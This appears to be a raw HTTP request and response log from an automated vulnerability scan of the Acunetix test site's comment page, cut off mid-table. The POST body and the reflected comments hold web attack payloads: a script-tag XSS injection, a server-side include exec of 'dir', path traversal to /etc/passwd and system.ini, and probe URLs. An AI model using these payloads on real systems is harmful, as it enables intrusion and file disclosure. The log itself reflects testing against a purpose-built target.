__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFggCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WBB8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT8fAAUSUmVhZE5ld3MuYXNweD9pZD0yZAIHDxYCHwEFrAIyMSBKdWx5IDIwMDUgLSBTdGFydC11cCBjb21wYW55IEFjdW5ldGl4IHJlbGVhc2VkIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXI6IGEgdG9vbCB0byBhdXRvbWF0aWNhbGx5IGF1ZGl0IHdlYnNpdGUgc2VjdXJpdHkuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgMiBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUsIGxhdW5jaGVzIHBvcHVsYXIgd2ViIGF0dGFja3MgKFNRTCBJbmplY3Rpb24gZXRjLikgYW5kIGlkZW50aWZpZXMgdnVsbmVyYWJpbGl0aWVzIHRoYXQgbmVlZCB0byBiZSBmaXhlZC5kZLQBJ3hOt3r5jKtYjVFFKdowCSWC&__VIEWSTATEGENERATOR=58A73C4D&__EVENTVALIDATION=%2FwEWWQKpxZClDQKAgcfvBQKFzrr8AQK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ%2Fpbihq93nLJJrCcGURk6iWNCIK%2BA%3D%3D&tbComment=%3C%2Fdiv%3E%3CscrIpt%3Ealert%281%29%3B%3C%2FscRipt%3E%3Cdiv%3E&btnSend=Send+commentResponse Status line and header section (222 bytes)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Mon, 25 Jul 2022 13:07:15 GMT Content-Length: 34006Response body (34006 bytes)
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Comments</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="Comments.aspx?id=2" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFgoCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WBB8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT8fAAUSUmVhZE5ld3MuYXNweD9pZD0yZAIHDxYCHwEFrAIyMSBKdWx5IDIwMDUgLSBTdGFydC11cCBjb21wYW55IEFjdW5ldGl4IHJlbGVhc2VkIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXI6IGEgdG9vbCB0byBhdXRvbWF0aWNhbGx5IGF1ZGl0IHdlYnNpdGUgc2VjdXJpdHkuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgMiBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUsIGxhdW5jaGVzIHBvcHVsYXIgd2ViIGF0dGFja3MgKFNRTCBJbmplY3Rpb24gZXRjLikgYW5kIGlkZW50aWZpZXMgdnVsbmVyYWJpbGl0aWVzIHRoYXQgbmVlZCB0byBiZSBmaXhlZC5kAgkPZBYCAgEPZBbwAWYPZBYCZg8WAh8BBSU8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYmVmb3JlLmdpZiI+ZAIBD2QWAmYPFgIeBWNsYXNzBQdDb21tZW50ZAICD2QWAmYPFgIfAQUkPElNRyBzcmM9ImltYWdlcy9jb21tZW50LWFmdGVyLmdpZiI+ZAIDD2QWAmYPFgIfAQUlPElNRyBzcmM9ImltYWdlcy9jb21tZW50LWJlZm9yZS5naWYiPmQCBA9kFgJmDxYCHwMFB0NvbW1lbnRkAgUPZBYCZg8WAh8BBSQ8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYWZ0ZXIuZ2lmIj5kAgYPZBYCZg8WAh8BBSU8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYmVmb3JlLmdpZiI+ZAIH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" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit || (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="58A73C4D" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWQLRtujbBQKAgcfvBQKFzrr8AQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q85f/uFteDjFkg90BqRgVgUmoU17A==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:35:22 AM</DIV> <a href="ReadNews.aspx?id=2" id="anchNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</a> <DIV id="divNewsShort" class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV> <div id="divComments">User comments: <table id="tblComments" cellspacing="0" cellpadding="0" width="500" border="0"> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:36 PM</DIV><DIV class="CommentText">3528756824722488419.owasp.org</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:37 PM</DIV><DIV class="CommentText">http://3528756824722488419.owasp.org</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:37 PM</DIV><DIV class="CommentText">https://3528756824722488419.owasp.org</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:37 PM</DIV><DIV class="CommentText">http:\\3528756824722488419.owasp.org</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:37 PM</DIV><DIV class="CommentText">https:\\3528756824722488419.owasp.org</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:37 PM</DIV><DIV class="CommentText">//3528756824722488419.owasp.org</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:38 PM</DIV><DIV class="CommentText">\\3528756824722488419.owasp.org</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:38 PM</DIV><DIV class="CommentText">HtTp://3528756824722488419.owasp.org</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:38 PM</DIV><DIV class="CommentText">HtTpS://3528756824722488419.owasp.org</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:07:16 PM</DIV><DIV class="CommentText">0W45pz4p</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:07:16 PM</DIV><DIV class="CommentText"></div><scrIpt>alert(1);</scRipt><div></DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:07:03 PM</DIV><DIV class="CommentText">"><!--#EXEC cmd="dir \"--><</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:31 PM</DIV><DIV class="CommentText">c:/Windows/system.ini</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:32 PM</DIV><DIV class="CommentText">../../../../../../../../../../../../../../../../Windows/system.ini</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:32 PM</DIV><DIV class="CommentText">c:\Windows\system.ini</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:32 PM</DIV><DIV class="CommentText">..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\system.ini</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:32 PM</DIV><DIV class="CommentText">/etc/passwd</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:33 PM</DIV><DIV class="CommentText">../../../../../../../../../../../../../../../../etc/passwd</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:33 PM</DIV><DIV class="CommentText">c:/</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:33 PM</DIV><DIV class="CommentText">/</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:33 PM</DIV><DIV class="CommentText">c:\</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:34 PM</DIV><DIV class="CommentText">../../../../../../../../../../../../../../../../</DIV></td> 